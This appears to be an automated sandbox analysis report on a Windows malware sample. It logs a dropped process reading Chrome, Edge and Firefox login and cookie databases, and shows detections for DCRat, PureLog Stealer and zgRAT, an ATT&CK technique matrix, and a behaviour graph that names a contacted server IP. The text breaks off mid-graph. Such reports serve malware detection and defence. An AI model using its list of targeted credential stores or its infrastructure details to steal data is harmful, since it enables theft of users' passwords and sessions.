                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Windows\ShellExperiences\uAsLgsGzSk.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000005.00000002.1930693014.00000000137F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000002A.00000002.3042679176.000000000314D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: serverBrokerperfMonitor.exe PID: 7580, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: uAsLgsGzSk.exe PID: 7860, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: hz7DzW2Yop.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1669057871.000000000620B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1669587198.0000000006A09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000000.1829997271.0000000000FE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: hz7DzW2Yop.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.serverBrokerperfMonitor.exe.fe0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6a4eee9.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.hz7DzW2Yop.exe.6250ee9.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Defender\en-GB\uAsLgsGzSk.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Recovery\SystemSettings.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\HyperWebbroker\serverBrokerperfMonitor.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		Valid Accounts241
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		11
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services1
                                    Archive Collected Data                                    		1
                                    Encrypted Channel                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		12
                                    Process Injection                                    		1
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory3
                                    File and Directory Discovery                                    		Remote Desktop Protocol2
                                    Data from Local System                                    		1
                                    Non-Application Layer Protocol                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Exploitation for Client Execution                                    		Logon Script (Windows)Logon Script (Windows)3
                                    Obfuscated Files or Information                                    		Security Account Manager167
                                    System Information Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		11
                                    Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts2
                                    Command and Scripting Interpreter                                    		Login HookLogin Hook1
                                    Software Packing                                    		NTDS371
                                    Security Software Discovery                                    		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading                                    		LSA Secrets2
                                    Process Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts132
                                    Masquerading                                    		Cached Domain Credentials261
                                    Virtualization/Sandbox Evasion                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                                    Virtualization/Sandbox Evasion                                    		DCSync1
                                    Application Window Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                    Process Injection                                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1587336 Sample: hz7DzW2Yop.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 Antivirus detection for dropped file 2->94 96 11 other signatures 2->96 10 hz7DzW2Yop.exe 3 6 2->10         started        14 uAsLgsGzSk.exe 2->14         started        16 svchost.exe 2->16         started        19 uAsLgsGzSk.exe 2->19         started        process3 dnsIp4 62 C:\...\serverBrokerperfMonitor.exe, PE32 10->62 dropped 64 C:\HyperWebbroker\kC1qNwulObrDTKeFv7nRu.vbe, data 10->64 dropped 102 Found many strings related to Crypto-Wallets (likely being stolen) 10->102 21 wscript.exe 1 10->21         started        104 Multi AV Scanner detection for dropped file 14->104 82 127.0.0.1 unknown unknown 16->82 file5 signatures6 process7 signatures8 98 Windows Scripting host queries suspicious COM object (likely to drop second stage) 21->98 100 Suspicious execution chain found 21->100 24 cmd.exe 1 21->24         started        process9 process10 26 serverBrokerperfMonitor.exe 3 25 24->26         started        30 conhost.exe 24->30         started        file11 66 C:\Windows\ShellExperiences\uAsLgsGzSk.exe, PE32 26->66 dropped 68 C:\Users\user\Desktop\zIxCDFUn.log, PE32 26->68 dropped 70 C:\Users\user\Desktop\zHJVyCcw.log, PE32 26->70 dropped 72 13 other malicious files 26->72 dropped 106 Antivirus detection for dropped file 26->106 108 Multi AV Scanner detection for dropped file 26->108 110 Machine Learning detection for dropped file 26->110 112 3 other signatures 26->112 32 cmd.exe 26->32         started        35 powershell.exe 26->35         started        37 powershell.exe 23 26->37         started        39 3 other processes 26->39 signatures12 process13 signatures14 86 Drops executables to the windows directory (C:\Windows) and starts them 32->86 41 uAsLgsGzSk.exe 32->41         started        46 conhost.exe 32->46         started        60 2 other processes 32->60 88 Loading BitLocker PowerShell Module 35->88 48 conhost.exe 35->48         started        50 WmiPrvSE.exe 35->50         started        52 conhost.exe 37->52         started        54 conhost.exe 39->54         started        56 conhost.exe 39->56         started        58 conhost.exe 39->58         started        process15 dnsIp16 84 89.23.100.242, 49736, 49737, 49738 MAXITEL-ASRU Russian Federation 41->84 74 C:\Users\user\Desktop\xRAMIbuT.log, PE32 41->74 dropped 76 C:\Users\user\Desktop\vPOensqX.log, PE32 41->76 dropped 78 C:\Users\user\Desktop\qTMMgMAe.log, 